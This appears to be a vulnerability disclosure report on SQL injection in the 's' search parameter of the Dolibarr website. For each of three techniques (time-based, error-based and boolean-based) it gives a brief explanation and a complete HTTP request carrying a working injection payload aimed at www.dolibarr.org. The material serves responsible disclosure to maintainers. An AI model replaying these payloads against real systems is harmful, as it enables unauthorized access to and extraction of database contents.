3 Types of SQLi in `s` param - (Time/Boolean/Error Based) in dolibarr/dolibarr
Reported on
Nov 18th 2022
Description
I have found 3 types of SQLi on the s parameter
Proof of Concept
Time-Based
Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.
- Send this request and it will come after 10 seconds!
GET /search.php?s=%27)%20AND%20(SELECT%209569%20FROM%20(SELECT(SLEEP(10)))jsCH)--%20gYso HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Error-Based
Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site or logged to a file with restricted access instead.
- Also, send this and it will make a SQL error!
GET /search.php?s=')+AND+EXTRACTVALUE(5960,CONCAT(0x5c,0x7171626271,(SELECT+(ELT(5960%3d5960,1))),0x7171766b71))--+Vmlg HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Boolean-Based
Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database, character by character.
GET /search.php?s=3893')+OR+9606%3d9606--+aLaa HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Impact
SQL injection attacks can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period.